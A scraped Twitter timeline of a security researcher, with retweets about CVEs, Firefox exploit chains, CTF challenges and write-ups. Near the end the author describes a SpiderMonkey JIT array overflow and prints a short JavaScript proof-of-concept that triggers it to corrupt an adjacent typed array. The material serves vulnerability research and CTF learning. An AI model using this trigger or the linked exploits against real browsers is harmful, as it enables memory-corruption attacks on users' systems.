Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
Blokirali ste korisnika/cu @sherl0ck__
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @sherl0ck__
-
Prikvačeni tweet
By the way, I have added the exploit script on github https://github.com/vigneshsrao/CVE-2019-11707 ….https://twitter.com/teambi0s/status/1163035917499559938 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Vignesh S Rao proslijedio/la je Tweet
just found that this writeup for CVE-2019-9793, a range analysis bug in Spidermonkey found by
@bkth_ and analyzed by me is now unrestricted: https://bug1528829.bmoattachments.org/attachment.cgi?id=9044718 … I thought it was a cool bug, although unfortunately Spectre mitigations prevented exploitation as far as I knowPrikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Vignesh S Rao proslijedio/la je Tweet
2019 was a great year for Exodus and 2020 is going to be even better. We're expecting to expand the team on a variety of fronts. If interested visit https://www.exodusintel.com/careers.html and email careers@exodusintel.com with a cv and references published work
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Vignesh S Rao proslijedio/la je Tweet
it's Chinese New Year's Eve!
so we're going to release some new challenges!
8 new challenges will be unlocked on UTC 2019-01-26 04:00Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Vignesh S Rao proslijedio/la je Tweet
Our member
@vishnudevtj found yet another bug in QEMU's network backend and was asssigned with CVE-2020-7039. For more info, checkout: https://access.redhat.com/security/cve/cve-2020-7039 …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Vignesh S Rao proslijedio/la je Tweet
Introducing MemLabs - Educational, CTF-styled labs for individuals interested in Memory Forensics, is now released. Link: https://github.com/stuxnet999/MemLabs … Author:
@_abhiramkumar#ctf#dfir#memoryforensics#infosec#cybersecurityHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Vignesh S Rao proslijedio/la je Tweet
Here is an exploit chain I wrote for Firefox that gets RCE via CVE-2019-9810 and escape the sandbox with CVE-2019-11708/CVE-2019-9810. Once compromised, it drops a payload and injects privileged JS code in already/newly created tabs. https://github.com/0vercl0k/CVE-2019-11708 …pic.twitter.com/LeAOCgqpMG
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Vignesh S Rao proslijedio/la je Tweet
Don't miss the episode later today at 17:00 UTC: https://www.youtube.com/watch?v=6wmyaYP5WkA …. We have a great competitor line-up consisting of: peace-maker, NotDeGhost,
@vishnudevtj and@__spq__ Who will be the first one to solve today's tricky pwnable#CTF challenge?Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Vignesh S Rao proslijedio/la je Tweet
Solving binary-only CTF challenges with honggfuzz and qemu binary instrumentation -http://matshao.com/2019/11/11/Redhat2019-Kaleidoscope/ …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Vignesh S Rao proslijedio/la je Tweet
Blog post on CVE-2019-2215, the Android binder bug that was exploited in-the-wild and affected most Android devices manufactured prior to Fall 2018. https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Vignesh S Rao proslijedio/la je Tweet
I just upgraded to Ubuntu 19.10 and noticed that they enable -fcf-protection by default in gcc which adds an endbr64 instruction in every function prologue. This seems strange for two reasons:
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Vignesh S Rao proslijedio/la je Tweet
Today is the 3rd anniversary of "Attacking JavaScript Engines". Not a lot has changed, but I tried to briefly summarize the things that did: https://gist.github.com/saelo/dd598a91a27ddd7cb9e410dc92bf37a1 … It's been a few month since my last interactions with JSC though, so any corrections/additions are very welcome :)
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Vignesh S Rao proslijedio/la je Tweet
Our members
@TarunkantG &@__c3rb3ru5__ did a small research in which they created a fuzzing tool that found new functions to bypass PHP disable_functions & can also tell how strong your disable_functions is. Full report: https://blog.bi0s.in/2019/10/26/Web/bypass-disable-functions/ … Tool:https://github.com/teambi0s/dfunc-bypasser …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Vignesh S Rao proslijedio/la je Tweet
Of course we also had a bunch of local teams playing. While attending the conference they achieved some quite competitive results. Our local winners are: 1.
@FlatNetworkOrg 2.@teambi0s 3.@We_0wn_Y0u Great job! See you at the award ceremony at 5:00pmHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Vignesh S Rao proslijedio/la je Tweet
Uploaded all my challenges for HITCON CTF Quals 2019! Include the src/sol of funny misc chals, a RE challenge written in Crystal, and the hardest challenges, PoE, that needs you to exploit the user-space program, the Linux kernel module, and hack QEMU!https://github.com/david942j/ctf-writeups/tree/master/hitcon-quals-2019 …
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Vignesh S Rao proslijedio/la je Tweet
My exploit for my challenges at HITCON CTF 2019 Qual https://github.com/scwuaptx/CTF/tree/master/2019-writeup/hitcon … Hope everyone can learn more from our CTF.
#hitconctfHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Vignesh S Rao proslijedio/la je Tweet
very interesting challenge XD, my write up for
#securenote#balsnCTFhttps://gist.github.com/Mipu94/8db7474bf7069b33c1cc7c4685431c21 …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Vignesh S Rao proslijedio/la je Tweet
Finally finished the navarint challenge at
@bsidesdelhi, written by@sherl0ck__ !! It has eluded solves from not one, but two competitions now! Kinda sad
for problem writer...
Here's my exploit file for the challenge:https://github.com/theKidOfArcrania/ctf-writeups/blob/master/2019/bsidesdelhi/navarint/exp.py …Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Vignesh S Rao proslijedio/la je Tweet
HACKED! Verbose booting iPhone X looks pretty cool. Starting in DFU Mode, it took 2 seconds to jailbreak it with checkm8, and then I made it automatically boot from NAND with patches for verbose boot. Latest iOS 13.1.1, and no need to upload any images. Thanks
@qwertyoruiopzpic.twitter.com/4fyOx3G7E0Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Simple 2 element overflow in Array, as initialized length is compared with (initialized length + 2) when jit'ed. Use this to overwrite the shape and group for the following object (say a Uint8Array) to that of Uint32Array, thus attaining a larger overflow in a typed array.
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
blah = new Array() blah.push(new Array(1.1,1.1)) blah.push(new Uint32Array(0x10)) function trigger(a1,a2){ blah[0][a1]=1.337; for (let i=0; i<100000; i++){} } for(var i=0;i<100;i++) trigger(0) trigger(2) blah[1]
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.